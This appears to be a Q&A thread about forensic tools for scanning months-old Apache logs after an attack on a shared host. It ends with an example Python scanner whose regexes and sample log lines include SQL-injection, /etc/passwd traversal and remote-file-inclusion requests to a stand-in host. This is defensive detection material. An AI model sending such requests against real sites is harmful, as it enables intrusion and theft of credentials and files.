6

What I need is a forensic log analyzer tool for Apache to do the aftermath of a successful abuse of service attack which took place 2-3 months in the past. We are running a shared hosting service and one of our customers seems to have (or had) an exploitable script running. I suspect that I could find clues and hints in the logs, but they are just too huge to browse through them manually or grep regexps from them.

Is there a tool which can do it and has predefined search patterns for known attacks and probably even heuristics to discover suspicious activities?

I do not look for a tool to do real-time blocking of such attempts because I need to analyze past logs and see if the exploit has been closed.

2 Answers

3

Probably, AWStats can help you. It is a free and open-source tool.

Edit/Update:
Check out Phpida and Scalp as well. They are security analyzers looking for HTTP attacks, SQL injection etc.
http://sourceforge.net/projects/phpida/
http://code.google.com/p/apache-scalp/

swatkat
2

Check out WebForensik

It's a PHPIDS-based script (released under GPL2) to scan your HTTPD logfiles for attacks against web applications.

Features:

  • supports standard log formats (common, combined)
  • allows user-defined (mod_log_config syntax) formats
  • automatically pipes your web logs through PHPIDS
  • categorizes all incidents by type, impact, date, host...
  • generates reports in CSV, HTML (sortable table), XML
guy_intro
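As an added illustration of what the tools above automate (this is example code, not part of either answer and not PHPIDS or WebForensik), here is a minimal offline scanner for Apache "combined" logs: it URL-decodes each request, matches it against a few hypothetical attack signatures, and tallies hits by category and source host so months-old logs can be triaged without reading them by hand. The signature set and the sample log lines are constructed for the example.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Apache "combined" log format: host ident user [time] "request" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)

# Hypothetical detection patterns (not PHPIDS's rule set), applied to the URL-decoded request.
PATTERNS = {
    "sqli": re.compile(r"(?i)(union\s+select|\bor\s+1\s*=\s*1\b|sleep\(\d+\)|information_schema)"),
    "traversal": re.compile(r"(\.\./){2,}|/etc/passwd"),
    "rfi": re.compile(r"(?i)[?&]\w+=(https?|ftp)://"),
}

def scan_line(line):
    """Return (category, host, day, decoded_request) if the line matches a pattern, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    # Decode twice so double-encoded payloads (%2527 -> %27 -> ') are seen in clear.
    decoded = unquote_plus(unquote_plus(m.group("path")))
    for category, pat in PATTERNS.items():
        if pat.search(decoded):
            day = m.group("time").split(":")[0]  # "12/Mar/2012" from "12/Mar/2012:10:01:09 +0000"
            return (category, m.group("host"), day, decoded)
    return None

def scan_log(lines):
    """Scan an iterable of log lines; return the findings plus per-category and per-host counts."""
    findings = [f for f in map(scan_line, lines) if f is not None]
    return findings, Counter(f[0] for f in findings), Counter(f[1] for f in findings)

# Constructed sample lines (RFC 5737 documentation addresses), not taken from any real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Mar/2012:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Mar/2012:10:01:09 +0000] "GET /index.php?id=1%20UNION%20SELECT%20user,pass%20FROM%20users HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [13/Mar/2012:02:14:55 +0000] "GET /gallery.php?file=../../../../etc/passwd HTTP/1.1" 404 221 "-" "curl/7.21"',
    '198.51.100.7 - - [13/Mar/2012:02:15:03 +0000] "GET /gallery.php?file=http://evil.example/inc.txt HTTP/1.1" 200 1090 "-" "curl/7.21"',
    '203.0.113.4 - - [14/Mar/2012:08:00:00 +0000] "POST /contact.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Mar/2012:10:02:30 +0000] "GET /index.php?id=1%2527%2520or%25201%253d1 HTTP/1.1" 200 734 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    findings, by_category, by_host = scan_log(SAMPLE_LOG)
    for category, host, day, request in findings:
        print(f"{day} {host:<14} {category:<9} {request}")
    print("by category:", dict(by_category), "by host:", dict(by_host))
```

To run it over real logs, replace SAMPLE_LOG with a file iterator; hosts whose hit count and status codes (a 200 on a traversal or inclusion attempt rather than a 404) stand out are the ones to pull the full request history for.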